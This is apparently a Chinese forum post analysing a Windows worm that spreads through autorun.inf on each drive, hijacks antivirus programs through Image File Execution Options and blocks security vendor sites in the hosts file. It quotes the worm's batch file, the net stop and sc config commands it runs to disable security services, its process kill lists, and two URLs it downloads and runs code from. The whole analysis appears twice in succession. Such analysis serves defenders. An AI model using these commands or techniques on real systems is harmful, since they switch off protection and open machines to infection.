之前见卡卡上某个菜鸟斑竹搞了篇这个的分析,还号称用了OD,结果出来的结果是错误百出,许多重要细节都没有提到,另外 对于病毒加密的那部分操作更是闭口不提,实在让人看不下去,放一篇正确的分析好了
病毒启动后
用explorer打开:
d:\
e:\
f:\
g:\
h:\
i:\
system32下:
随机名.exe
随机名.dll
severe.exe
hx1.bat
noruns.reg
drivers目录下:
conime.exe
随机名.exe
各盘符下:
OSO.exe
autorun.inf
运行:
system32下 随机.exe
severe.exe
drivers\conime.exe
创建线程:
sub_404958
生成hx1.bat
内容:
@echo off
set date=2004-1-22
ping ** localhost > nul
date %date%
del %0
bat的手段及习惯和ASN.2相似,可能同一作者
修改注册表:
1.software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
下CheckedValue为0(old=1)
2.Software\Microsoft\Windows\CurrentVersion\Run
下启动项(随机)
3.Software\Microsoft\Windows\CurrentVersion\Run
下启动项(severe.exe)
4.SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
下启动项
Shell = Explorer.exe %System32%\drivers\conime.exe
5.Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*
下Debugger=随机名.exe
*为被屏蔽的软件
屏蔽次序如下:
MagicSet.exe
Rav.exe
avp.com
avp.exe
KRegEx.exe
KvDetect.exe
KvXP.kxp
TrojDie.kxp
KVMonXP.kxp
IceSword.exe
mmsk.exe
WoptiClean.exe
kabaload.exe
360Safe.exe
runiep.exe
iparmo.exe
adam.exe
RavMon.exe
QQDoctor.exe
SREng.exe
Ras.exe
msconfig.exe
regedit.exe
regedit.com
msconfig.com
PFW.exe
PFWLiveUpdate.exe
EGHOST.exe
NOD32.exe
该串屏蔽列表和ASN.2的比较相似
随机名生成字串: @#Z!$/kqj
每隔1800秒创建线程sub_40B950
将自己copy到drivers目录下conime.exe
执行drivers\conime.exe
每隔1500秒创建线程
将自己copy到system32目录下随机名.exe
执行随机名.exe
每隔1500秒释放autorun.inf到各盘下
copy/执行drivers下conime.exe
创建自己的互斥对象 Q X-1,QX-2,QX-3
分别是3个EXE相互识别的方法
其实3个运行中EXE是同一个文件,只是运行次序不同,使用多个不同的互斥对象进行协作
创建线程:
sub_4097C0:
1.运行noruns.reg
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:b5
2.删除kakatool.dll
删除dqhx2.txt,dqhx3.txt
结束进程:NTdhcp.exe, SVCHOXT.EXE
修改hosts表,添加:
127.0.0.1 localhost
127.0.0.1 mmsk.cn
127.0.0.1 ikaka.com
127.0.0.1 safe.qq.com
127.0.0.1 360safe.com
127.0.0.1 www.mmsk.cn
127.0.0.1 www.ikaka.com
127.0.0.1 tool.ikaka.com
127.0.0.1 tool.ikaka.com
127.0.0.1 www.360safe.com
127.0.0.1 zs.kingsoft.com
127.0.0.1 forum.ikaka.com
127.0.0.1 up.rising.com.cn
127.0.0.1 scan.kingsoft.com
127.0.0.1 kvup.jiangmin.com
127.0.0.1 reg.rising.com.cn
127.0.0.1 update.rising.com.cn
127.0.0.1 update7.jiangmin.com
127.0.0.1 download.rising.com.cn
127.0.0.1 dnl-us1.kaspersky-labs.com
127.0.0.1 dnl-us2.kaspersky-labs.com
127.0.0.1 dnl-us3.kaspersky-labs.com
127.0.0.1 dnl-us4.kaspersky-labs.com
127.0.0.1 dnl-us5.kaspersky-labs.com
127.0.0.1 dnl-us6.kaspersky-labs.com
127.0.0.1 dnl-us7.kaspersky-labs.com
127.0.0.1 dnl-us8.kaspersky-labs.com
127.0.0.1 dnl-us9.kaspersky-labs.com
127.0.0.1 dnl-us10.kaspersky-labs.com
127.0.0.1 dnl-eu1.kaspersky-labs.com
127.0.0.1 dnl-eu1.kaspersky-labs.com
127.0.0.1 dnl-eu2.kaspersky-labs.com
127.0.0.1 dnl-eu3.kaspersky-labs.com
127.0.0.1 dnl-eu4.kaspersky-labs.com
127.0.0.1 dnl-eu5.kaspersky-labs.com
127.0.0.1 dnl-eu6.kaspersky-labs.com
127.0.0.1 dnl-eu7.kaspersky-labs.com
127.0.0.1 dnl-eu8.kaspersky-labs.com
127.0.0.1 dnl-eu9.kaspersky-labs.com
127.0.0.1 dnl-eu10.kaspersky-labs.com
创建线程: sub_40B0C8
1.从 http://www.cd321.net/30w.txt 获取更新并下载执行
2.从 http://www.ctv163.com/admin/down.txt 获取更新并下载执行
创建线程: sub_40AD14
1.创建互斥体:ExeMutex_QQRobber2.0,DllMutex_QQRobber2.0,阻止QQ大盗运行
2.查找所有窗口标题,找到包含:杀毒,专杀,病毒,木马,注册表的窗口
给它们投递WM_QUIT消息,使之退出
3.运行命令:
net stop srservice
sc config srservice start= disabled
net stop stop sharedaccess
net stop KVWSC
sc config KVWSC start= disabled
net stop KVSrvXP
sc config KVSrvXP start= disabled
net stop kavsvc
sc config kavsvc start= disabled
sc config RsRavMon start= disabled
net stop RsCCenter
sc config RsCCenter start= disabled
net stop RsRavMon
4.找到包含"瑞星提示"的窗口,并在该窗口上使用FindWindowsEx找到标题为"是(&Y)"的按钮,向其投递BM_CLICK消息,自动点击是按钮
5.查找并结束下列进程:
sc.exe
cmd.exe
net.exe
sc1.exe
net1.exe
PFW.exe
Kav.exe
KVOL.exe
KVFW.exe
adam.exe
qqav.exe
qqkav.exe
TBMon.exe
kav32.exe
kvwsc.exe
CCAPP.exe
KRegEx.exe
kavsvc.exe
VPTray.exe
RAVMON.exe
EGHOST.exe
KavPFW.exe
SHSTAT.exe
RavTask.exe
TrojDie.kxp
Iparmor.exe
MAILMON.exe
MCAGENT.exe
KAVPLUS.exe
RavMonD.exe
Rtvscan.exe
Nvsvc32.exe
KVMonXP.exe
Kvsrvxp.exe
CCenter.exe
KpopMon.exe
RfwMain.exe
RfwMain.exe
MCVSESCN.exe
MSKAGENT.exe
kvolself.exe
KVCenter.kxp
kavstart.exe
RAVTIMER.exe
RRfwMain.exe
FireTray.exe
UpdaterUI.exe
KVSrvXp_1.exe
RavService.exe
2.创建互斥体:AntiTrojan3721,ASSISTSHELLMUTEX,SKYNET_PERSONAL_FIREWALL,KingsoftAntivirusScanProgram7Mutex,阻止3721反间谍专家、天网、金山杀毒运行
3.进行镜象劫持、启动项、文件隐藏等的注册表修改,见前
创建线程: sub_40AC8C
该线程在sub_40AD14修改注册表后产生
先sleep 8秒
再使用FindWindowA找到标题为"瑞星注册表监控提示"的窗口,将其带到前台,然后操作鼠标点击关闭之
sleep 1秒
再重复查找/关闭动作,重复9次结束
[ 本帖最后由 teyqiu 于 2007-2-6 09:44 编辑 ]
病毒启动后
用explorer打开:
d:\
e:\
f:\
g:\
h:\
i:\
system32下:
随机名.exe
随机名.dll
severe.exe
hx1.bat
noruns.reg
drivers目录下:
conime.exe
随机名.exe
各盘符下:
OSO.exe
autorun.inf
运行:
system32下 随机.exe
severe.exe
drivers\conime.exe
创建线程:
sub_404958
生成hx1.bat
内容:
@echo off
set date=2004-1-22
ping ** localhost > nul
date %date%
del %0
bat的手段及习惯和ASN.2相似,可能同一作者
修改注册表:
1.software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall
下CheckedValue为0(old=1)
2.Software\Microsoft\Windows\CurrentVersion\Run
下启动项(随机)
3.Software\Microsoft\Windows\CurrentVersion\Run
下启动项(severe.exe)
4.SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
下启动项
Shell = Explorer.exe %System32%\drivers\conime.exe
5.Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*
下Debugger=随机名.exe
*为被屏蔽的软件
屏蔽次序如下:
MagicSet.exe
Rav.exe
avp.com
avp.exe
KRegEx.exe
KvDetect.exe
KvXP.kxp
TrojDie.kxp
KVMonXP.kxp
IceSword.exe
mmsk.exe
WoptiClean.exe
kabaload.exe
360Safe.exe
runiep.exe
iparmo.exe
adam.exe
RavMon.exe
QQDoctor.exe
SREng.exe
Ras.exe
msconfig.exe
regedit.exe
regedit.com
msconfig.com
PFW.exe
PFWLiveUpdate.exe
EGHOST.exe
NOD32.exe
该串屏蔽列表和ASN.2的比较相似
随机名生成字串: @#Z!$/kqj
每隔1800秒创建线程sub_40B950
将自己copy到drivers目录下conime.exe
执行drivers\conime.exe
每隔1500秒创建线程
将自己copy到system32目录下随机名.exe
执行随机名.exe
每隔1500秒释放autorun.inf到各盘下
copy/执行drivers下conime.exe
创建自己的互斥对象 Q X-1,QX-2,QX-3
分别是3个EXE相互识别的方法
其实3个运行中EXE是同一个文件,只是运行次序不同,使用多个不同的互斥对象进行协作
创建线程:
sub_4097C0:
1.运行noruns.reg
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:b5
2.删除kakatool.dll
删除dqhx2.txt,dqhx3.txt
结束进程:NTdhcp.exe, SVCHOXT.EXE
修改hosts表,添加:
127.0.0.1 localhost
127.0.0.1 mmsk.cn
127.0.0.1 ikaka.com
127.0.0.1 safe.qq.com
127.0.0.1 360safe.com
127.0.0.1 www.mmsk.cn
127.0.0.1 www.ikaka.com
127.0.0.1 tool.ikaka.com
127.0.0.1 tool.ikaka.com
127.0.0.1 www.360safe.com
127.0.0.1 zs.kingsoft.com
127.0.0.1 forum.ikaka.com
127.0.0.1 up.rising.com.cn
127.0.0.1 scan.kingsoft.com
127.0.0.1 kvup.jiangmin.com
127.0.0.1 reg.rising.com.cn
127.0.0.1 update.rising.com.cn
127.0.0.1 update7.jiangmin.com
127.0.0.1 download.rising.com.cn
127.0.0.1 dnl-us1.kaspersky-labs.com
127.0.0.1 dnl-us2.kaspersky-labs.com
127.0.0.1 dnl-us3.kaspersky-labs.com
127.0.0.1 dnl-us4.kaspersky-labs.com
127.0.0.1 dnl-us5.kaspersky-labs.com
127.0.0.1 dnl-us6.kaspersky-labs.com
127.0.0.1 dnl-us7.kaspersky-labs.com
127.0.0.1 dnl-us8.kaspersky-labs.com
127.0.0.1 dnl-us9.kaspersky-labs.com
127.0.0.1 dnl-us10.kaspersky-labs.com
127.0.0.1 dnl-eu1.kaspersky-labs.com
127.0.0.1 dnl-eu1.kaspersky-labs.com
127.0.0.1 dnl-eu2.kaspersky-labs.com
127.0.0.1 dnl-eu3.kaspersky-labs.com
127.0.0.1 dnl-eu4.kaspersky-labs.com
127.0.0.1 dnl-eu5.kaspersky-labs.com
127.0.0.1 dnl-eu6.kaspersky-labs.com
127.0.0.1 dnl-eu7.kaspersky-labs.com
127.0.0.1 dnl-eu8.kaspersky-labs.com
127.0.0.1 dnl-eu9.kaspersky-labs.com
127.0.0.1 dnl-eu10.kaspersky-labs.com
创建线程: sub_40B0C8
1.从 http://www.cd321.net/30w.txt 获取更新并下载执行
2.从 http://www.ctv163.com/admin/down.txt 获取更新并下载执行
创建线程: sub_40AD14
1.创建互斥体:ExeMutex_QQRobber2.0,DllMutex_QQRobber2.0,阻止QQ大盗运行
2.查找所有窗口标题,找到包含:杀毒,专杀,病毒,木马,注册表的窗口
给它们投递WM_QUIT消息,使之退出
3.运行命令:
net stop srservice
sc config srservice start= disabled
net stop stop sharedaccess
net stop KVWSC
sc config KVWSC start= disabled
net stop KVSrvXP
sc config KVSrvXP start= disabled
net stop kavsvc
sc config kavsvc start= disabled
sc config RsRavMon start= disabled
net stop RsCCenter
sc config RsCCenter start= disabled
net stop RsRavMon
4.找到包含"瑞星提示"的窗口,并在该窗口上使用FindWindowsEx找到标题为"是(&Y)"的按钮,向其投递BM_CLICK消息,自动点击是按钮
5.查找并结束下列进程:
sc.exe
cmd.exe
net.exe
sc1.exe
net1.exe
PFW.exe
Kav.exe
KVOL.exe
KVFW.exe
adam.exe
qqav.exe
qqkav.exe
TBMon.exe
kav32.exe
kvwsc.exe
CCAPP.exe
KRegEx.exe
kavsvc.exe
VPTray.exe
RAVMON.exe
EGHOST.exe
KavPFW.exe
SHSTAT.exe
RavTask.exe
TrojDie.kxp
Iparmor.exe
MAILMON.exe
MCAGENT.exe
KAVPLUS.exe
RavMonD.exe
Rtvscan.exe
Nvsvc32.exe
KVMonXP.exe
Kvsrvxp.exe
CCenter.exe
KpopMon.exe
RfwMain.exe
RfwMain.exe
MCVSESCN.exe
MSKAGENT.exe
kvolself.exe
KVCenter.kxp
kavstart.exe
RAVTIMER.exe
RRfwMain.exe
FireTray.exe
UpdaterUI.exe
KVSrvXp_1.exe
RavService.exe
2.创建互斥体:AntiTrojan3721,ASSISTSHELLMUTEX,SKYNET_PERSONAL_FIREWALL,KingsoftAntivirusScanProgram7Mutex,阻止3721反间谍专家、天网、金山杀毒运行
3.进行镜象劫持、启动项、文件隐藏等的注册表修改,见前
创建线程: sub_40AC8C
该线程在sub_40AD14修改注册表后产生
先sleep 8秒
再使用FindWindowA找到标题为"瑞星注册表监控提示"的窗口,将其带到前台,然后操作鼠标点击关闭之
sleep 1秒
再重复查找/关闭动作,重复9次结束
[ 本帖最后由 teyqiu 于 2007-2-6 09:44 编辑 ]
1927
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
